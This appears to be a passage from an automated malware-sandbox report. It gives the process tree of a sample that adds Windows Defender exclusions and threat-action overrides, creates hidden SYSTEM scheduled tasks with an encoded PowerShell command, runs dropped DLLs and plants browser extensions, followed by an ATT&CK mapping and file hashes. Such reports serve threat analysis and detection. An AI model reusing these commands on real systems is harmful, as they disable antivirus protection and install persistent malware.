C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BcCQMXwjU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BcCQMXwjU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ITFcQRBGgRUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ITFcQRBGgRUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SwHdQyPSnQdU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SwHdQyPSnQdU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mfOEuGwqkLFbC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mfOEuGwqkLFbC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xRoHTrfYcfGreqCFIqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xRoHTrfYcfGreqCFIqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\UakFvFPMbXVAWgVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\UakFvFPMbXVAWgVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\IvFVVHNigIyhAiWaa\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\IvFVVHNigIyhAiWaa\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QomKEDtaZauBMonw\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QomKEDtaZauBMonw\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BcCQMXwjU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BcCQMXwjU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BcCQMXwjU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ITFcQRBGgRUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ITFcQRBGgRUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SwHdQyPSnQdU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SwHdQyPSnQdU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mfOEuGwqkLFbC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mfOEuGwqkLFbC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xRoHTrfYcfGreqCFIqR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xRoHTrfYcfGreqCFIqR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\UakFvFPMbXVAWgVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\UakFvFPMbXVAWgVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\IvFVVHNigIyhAiWaa /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\IvFVVHNigIyhAiWaa /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QomKEDtaZauBMonw /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QomKEDtaZauBMonw /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gLAIdHpKA" /SC once /ST 17:58:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gLAIdHpKA"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gLAIdHpKA"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MVZgvzYKAFemhQpXL" /SC once /ST 14:17:35 /RU "SYSTEM" /TR "\"C:\Windows\Temp\QomKEDtaZauBMonw\fdsKOKogfpICasy\KRtjXHn.exe\" XP /qgsite_idNLu 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "MVZgvzYKAFemhQpXL"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\QomKEDtaZauBMonw\fdsKOKogfpICasy\KRtjXHn.exeC:\Windows\Temp\QomKEDtaZauBMonw\fdsKOKogfpICasy\KRtjXHn.exe XP /qgsite_idNLu 525403 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bXvtwaJkKQEzfXjvnG"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\BcCQMXwjU\YmSHPF.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "fjXiyaIJtNnEyln" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "fjXiyaIJtNnEyln2" /F /xml "C:\Program Files (x86)\BcCQMXwjU\ofYmWRY.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "fjXiyaIJtNnEyln"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "fjXiyaIJtNnEyln"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "IqaVnllQPEviET" /F /xml "C:\Program Files (x86)\SwHdQyPSnQdU2\IXDlPKV.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "JGPIZArYwJUkk2" /F /xml "C:\ProgramData\UakFvFPMbXVAWgVB\gEhelVJ.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZsHeBHvvmLjUCPViS2" /F /xml "C:\Program Files (x86)\xRoHTrfYcfGreqCFIqR\fhVzBeL.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MjkxzwBObpHYXaFcLDg2" /F /xml "C:\Program Files (x86)\mfOEuGwqkLFbC\Pnhdyer.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xxPoWeVRQBzFwCLPV" /SC once /ST 15:32:57 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\QomKEDtaZauBMonw\AFiLmQlV\gswNwBJ.dll\",#1 /DUsite_idjSA 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "xxPoWeVRQBzFwCLPV"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "MVZgvzYKAFemhQpXL"2⤵
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QomKEDtaZauBMonw\AFiLmQlV\gswNwBJ.dll",#1 /DUsite_idjSA 5254031⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QomKEDtaZauBMonw\AFiLmQlV\gswNwBJ.dll",#1 /DUsite_idjSA 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "xxPoWeVRQBzFwCLPV"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Create or Modify System Process
4Windows Service
4Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Create or Modify System Process
4Windows Service
4Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Defense Evasion
Modify Registry
3Virtualization/Sandbox Evasion
1Impair Defenses
2Disable or Modify System Firewall
1Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpiFilesize
2.0MB
MD5e561bb0d287626aae17b00e4e93f08b6
SHA1732af4825846372480fa47079e830a97c5ad86e8
SHA25695a36d1906ea9d995af77f247c8f16006f836857568246e75e4cdd2e97ffbfa1
SHA5123eb0ad320f4d94a2bdaee657d7262d2d491ba32db755a3d24d2f2543994ef2b2f178f4950d382ddc7bf0c07e5bc4ad7fa563d14e60f35f3f409f557f10fecb99
-
C:\ProgramData\Are.docxFilesize
11KB
MD5a33e5b189842c5867f46566bdbf7a095
SHA1e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA2565abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b
-
C:\ProgramData\mozglue.dllFilesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
C:\ProgramData\nss3.dllFilesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.jsonFilesize
187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.jsonFilesize
136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.jsonFilesize
150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
11KB
MD54ee8d18ab8ebbdfe3181962908e2e465
SHA1627bdedd908df0b9b6615a5a9f4c7ea81c58d826
SHA2566ee26125728e90747197e1cca638f901fb21a932283828481a4eaf3ed38c37a1
SHA512778c5dfb23f29f3c598fbae8dbfae37eb535a267a542caf78c1dd32009cbe792edc3f4ea33f54e205844aa29cfbade8b139fc98a7cf34aa8b755f3e661b0a591
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
1KB
MD528854213fdaa59751b2b4cfe772289cc
SHA1fa7058052780f4b856dc2d56b88163ed55deb6ab
SHA2567c65fe71d47e0de69a15b95d1ee4b433c07a1d6f00f37dd32aee3666bb84a915
SHA5121e2c928242bdef287b1e8afe8c37427cfd3b7a83c37d4e00e45bcbaa38c9b0bf96f869a062c9bc6bb58ecd36e687a69b21d5b07803e6615a9b632922c1c5ace4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\abgdohlnibdejcajjfmngebmdanjldcc\1.2_0\_locales\es\messages.jsonFilesize
151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
11KB
MD56c6cbb873397876b9ea3e27a8e75ef1b
SHA102dc052faa13ad0f8c1dc09163b0410e57f0a972
SHA256325da951d8244245938ea8f2a13229ac5b0356ad2ca58ce9707fcfc026adb57f
SHA512fb1b489946f29ebed73597ffb335d37c760d923c727352bb300b8b76895b7b36aa676a52a7a6153856e2ac4911e9dd20c34b8a22e49fdae6637591921b7f1474
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
11KB
MD583e3f31d5282191d29df8a041862adc4
SHA105859a1429eeccde17586e3c2e7d9032fb8872e0
SHA256e12b7f00a4ba24a92e9762346224be681abd9aafde8e6d37b58aa18e041e293c
SHA512a758a7b3bec58ab563ea977e89b9418a03de0ec745090ab696f53675b8be7a78acff0200c332e7fcddde0a5ff214860dcdb9d00adfa141474f33b789d4591732
-
C:\Users\Admin\AppData\Local\Temp\7zS94F8.tmp\Install.exeFilesize
6.7MB
MD5fe7aab543ab381ec66ae64eba66dd03b
SHA193e737338bd65c581795fdac1b0837dcded65d4c
SHA2567d4134b6ca60ee8f9a9a146303583d4cc0aa5b99145ed56589cb85820e264231
SHA5124345ece37104fa53a32281f1a778dbc310ec45afb760ef2e109191a0ffdd82147254d1a6cc6102e61083362dd8fb9f0a88423385c023dee08841eaaf22321783
-
C:\Users\Admin\AppData\Local\Temp\Protect544cd51a.dllFilesize
742KB
MD5544cd51a596619b78e9b54b70088307d
SHA14769ddd2dbc1dc44b758964ed0bd231b85880b65
SHA256dfce2d4d06de6452998b3c5b2dc33eaa6db2bd37810d04e3d02dc931887cfddd
SHA512f56d8b81022bb132d40aa78596da39b5c212d13b84b5c7d2c576bbf403924f1d22e750de3b09d1be30aea359f1b72c5043b19685fc9bf06d8040bfee16b17719
-
C:\Users\Admin\AppData\Local\Temp\TmpBAFE.tmpFilesize
2KB
MD51420d30f964eac2c85b2ccfe968eebce
SHA1bdf9a6876578a3e38079c4f8cf5d6c79687ad750
